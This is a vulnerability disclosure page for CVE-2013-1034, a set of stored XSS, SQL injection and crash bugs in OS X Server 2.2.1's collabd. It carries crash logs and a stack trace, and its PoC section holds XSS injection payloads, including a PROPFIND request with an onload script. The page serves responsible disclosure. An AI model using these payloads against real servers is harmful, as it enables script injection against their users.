CVE-2013-1034, Stored XSS, XXE, OS X Server v2.2.1, APPLE-SA-2013-09-17-1, HTML Injection, JSON XSS, Stored DOM XSS, SQL Injection

CVE-2013-1034 Summary

CVE-2013-1034, Security, Cross-Site Scripting, Private Bug Report, Apple, Stored JSON XSS, APPLE-SA-2013-09-17-1, CWE-79, CAPEC-86, CWE-611, Mountain Lion, OS X Version 2.2.1, DoS, Crash, SQL Injection, Blind SQL Injection, Ruby, XML External Entity Injection, CAPEC-66, Colladb

Last Updated 18/9/2013 @ 1800 GMT

APPLE-SA-2013-09-17-1 was released on September 17, 2013 to address multiple Bugs in OS X Server 2.2.1(163), collabd, reported to Apple Product Security on April 17, 2013.

Keywords
CVE-2013-1034Cross-Site Scripting, Apple, APPLE-SA-2013-09-17-1CWE-79CAPEC-86CWE-611OS X Version 2.2.1, DoS, Crash, CAPEC-66, Colladb, Ruby on Rails, PostgreSQL

Impact
CVSS Severity (version 2.0):
CVSS v2 Base Score:4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
CVSS Version 2 Metrics:
Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism
Access Complexity: Medium
Authentication: Not required to exploit
Impact Type:Allows unauthorized modification

Vulnerable Software Version & Upgrade Information
The vulnerable platform is based on the APPLE OS X Version 2.2.1. The current release is OS X Server 2.2.2. Open the App Store Application in OS X and click on Update.

Additionally: Multiple vulnerabilities existed in PostgreSQL, the most serious of which may lead to data corruption and/or privilege escalation.

Crash Info:
Vanilla Test Case: 1)The signature is injected into the Web Application, then 2) collabd does an INSERT, then 3) the NULL crashes Collabd, when 4) querying for a UUID. Note the difference in expression which Crashes the App contrasted with a Valid Query.

Log Files:
server.local collabd: [CSODService] No user records returned for query [<s[NULL]cript>confirm(9)</s[NULL]cript>’>Click for XSS</a>]
……..
server.local collabd: [PGCConnection: Error in TXN: Error executing query [INSERT INTO entity (is_deleted, long_name, is_blog_enabled, description, container_uid_fk, create_time, updatedby_user_fk, revision, short_name, theme_info, owner_entity_type_fk, ownedby_uid_fk, entity_type_fk, createdby_user_fk, is_hidden, uid, blog_uid_fk, tiny_id, parent_uids, update_time, avatar_uid_fk, is_perm_deleted) VALUES (DEFAULT, $1, DEFAULT, $2, DEFAULT, DEFAULT, $3, DEFAULT, $4, DEFAULT, DEFAULT, $5, $6, $7, DEFAULT, $8, $9, $10, DEFAULT, DEFAULT, DEFAULT, DEFAULT)]: ERROR:  invalid input syntax for uuid: “<s[NULL]cript>confirm(9)</s[NULL]cript>”

===============
STACK GUARD OUTPUT
===============

Process:         collabd [45073]
Path:            /Applications/Server.app/Contents/ServerRoot/usr/sbin/collabd
Identifier:      collabd
Version:         238.17
Code Type:       X86-64 (Native)

Date/Time:       2013-04-17
OS Version:      Mac OS X 10.8.3 (12D78)
Report Version:  10

Crashed Thread:  4  ServiceRequest:[(null) (null)]  Dispatch queue: com.apple.root.background-priority

Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Codes: KERN_PROTECTION_FAILURE at 0x00000001103e1fc8

VM Regions Near 0x1103e1fc8:
    Stack                  000000011035f000-00000001103e1000 [  520K] rw-/rwx SM=COW  thread 8
–> STACK GUARD            00000001103e1000-00000001103e2000 [    4K] —/rwx SM=NUL  stack guard for thread 4
    Stack                  00000001103e2000-0000000110464000 [  520K] rw-/rwx SM=COW  thread 4

Thread 0:: Dispatch queue: com.apple.main-thread
0   libsystem_kernel.dylib         0x00007fff86a84686 mach_msg_trap + 10
1   libsystem_kernel.dylib         0x00007fff86a83c42 mach_msg + 70
2   com.apple.CoreFoundation       0x00007fff8891d233 __CFRunLoopServiceMachPort + 195
3   com.apple.CoreFoundation       0x00007fff88922916 __CFRunLoopRun + 1078
4   com.apple.CoreFoundation       0x00007fff889220e2 CFRunLoopRunSpecific + 290
5   com.apple.CoreFoundation       0x00007fff88930dd1 CFRunLoopRun + 97
6   collabd                       0x000000010e8a4e39 main + 1316
7   libdyld.dylib                 0x00007fff813317e1 start + 1

Thread 1:: Dispatch queue: com.apple.libdispatch-manager
0   libsystem_kernel.dylib         0x00007fff86a86d16 kevent + 10
1   libdispatch.dylib             0x00007fff85e01dea _dispatch_mgr_invoke + 883
2   libdispatch.dylib             0x00007fff85e019ee _dispatch_mgr_thread + 54

Thread 2:: com.apple.NSURLConnectionLoader
0   libsystem_kernel.dylib         0x00007fff86a84686 mach_msg_trap + 10
1   libsystem_kernel.dylib         0x00007fff86a83c42 mach_msg + 70
2   com.apple.CoreFoundation       0x00007fff8891d233 __CFRunLoopServiceMachPort + 195
3   com.apple.CoreFoundation       0x00007fff88922916 __CFRunLoopRun + 1078
4   com.apple.CoreFoundation       0x00007fff889220e2 CFRunLoopRunSpecific + 290
5   com.apple.Foundation           0x00007fff88ceab66 +[NSURLConnection(Loader) _resourceLoadLoop:] + 356
6   com.apple.Foundation           0x00007fff88d48cd2 __NSThread__main__ + 1345
7   libsystem_c.dylib             0x00007fff8610a7a2 _pthread_start + 327
8   libsystem_c.dylib             0x00007fff860f71e1 thread_start + 13

Thread 3:: com.apple.CFSocket.private
0   libsystem_kernel.dylib         0x00007fff86a86322 __select + 10
1   com.apple.CoreFoundation       0x00007fff88961f46 __CFSocketManager + 1302
2   libsystem_c.dylib             0x00007fff8610a7a2 _pthread_start + 327
3   libsystem_c.dylib             0x00007fff860f71e1 thread_start + 13

Thread 4 Crashed:: ServiceRequest:[(null) (null)]  Dispatch queue: com.apple.root.background-priority
0   com.apple.CSService           0x000000010e93c137 -[CSJSONEncoder sanitizeObject:] + 20
1   com.apple.CSService           0x000000010e93c464 -[CSJSONEncoder sanitizeObject:] + 833
2   com.apple.CSService           0x000000010e93c464 -[CSJSONEncoder sanitizeObject:] + 833
3   com.apple.CSService           0x000000010e93c464 -[CSJSONEncoder sanitizeObject:] + 833

XSS PoC
PROPFIND /calendars/__uids__/{…}/ HTTP/1.1
Host: server.local
…[SNIP]…
Inject Signature: w3.org/1999/xhtml&apos;&gt;&lt;a:body onload=&apos;alert(1)&apos;/&gt;&lt;/a&gt;” xmlns:I=”http://apple.com/ns/ical/” xmlns:CS=”http://calendarserver.org/ns/”><D:prop><D:displayname/><D:resourcetype/><D:current-user-privilege-set/><I:calendar-color/>
…[SNIP]…

Response Fingerprint

…[SNIP]…
<schedule-default-calendar-URL xmlns=’urn:ietf:params:xml:ns:caldav<a xmlns:a=’http://www.w3.org/1999/xhtml’><a:body onload=’alert(1)’/></a>’/>
…[SNIP]…

SQL Injection Info
Here is an example Response:
…[SNIP]…

HTTP/1.1 500 Internal Server Error
…[SNIP]…
Server Fingerprint: “Server: thin 1.3.1 codename Triple Espresso”
…[SNIP]…
Caught exception “Error executing query [SELECT count(entity_uid_fk) FROM filedata_entity WHERE entity_uid_fk = $1]: ERROR: invalid input syntax for uuid: “{PoC}”
” [PGCQueryError] executing route {PoC}:
(
   0 CoreFoundation 0x00007fff8d36ab06 __exceptionPreprocess + 198
   1 libobjc.A.dylib 0x00007fff89b663f0 objc_exception_throw + 43
   2 PostgreSQLClient 
…[SNIP]…
{
“succeeded” : false,
“response” : {
“exceptionString” : “Error executing query [SELECT array_agg(group_id) FROM groups WHERE ‘group:’||group_id IN (SELECT external_id 
…[SNIP]…
R JOIN entity ON (entity.uid=ANY($1)) WHERE entity_uid_fk=ANY(entity.parent_uids::uuid[]))]: ERROR: invalid input syntax for uuid: “{PoC}”n”,
“exceptionName” : “PGCQueryError”
},
“type” : “com.apple.ServiceResponse”,
“referencedObjects” : [
],
“responseStatus” : “failed”

}

…[SNIP]…

Data Mining
JS Sources: /__wiki/coreclient/javascripts/sprockets.js + CalAccess, CalDev and other Files
JS Sinks: collabdproxy + devicemanagement/console/sproutcore/en/{…}/javascript-packed.js
Rails.root: /Applications/Server.app/Contents/ServerRoot/usr/share/collabd/coreclient

Rails Note
Rails is bundled with OS X Server 2.2.2
Rails may be only be accessible at a certain route, such as route /wiki or route /calendar
Server Fingerprint: “Server: thin 1.3.1 codename Triple Espresso”

Knowledgebase
Felix Wilhelm: Analysis of Rails XML Parameter Parsing Vulnerability
HD Moore: Serialization Mischief in Ruby Land
Google Groups: Multiple vulnerabilities in parameter parsing in Action Pack (CVE-2013-0156)
Google Groups: SQL Injection Vulnerability in Ruby on Rails (CVE-2012-5664)

External Links

APPLE-SA-2013-09-17-1, CVE-2013-1034SA54891CERTA-2013-AVI-532CB-K13-0666

Responsible Disclosure

XSS, Javascript Injection, Hoyt LLC Research, CWE-79, CAPEC-66, SQL Injection

When you find a Bug or Exploitable Issue in an Apple Product or Service, file a Private Report with Apple Product Security.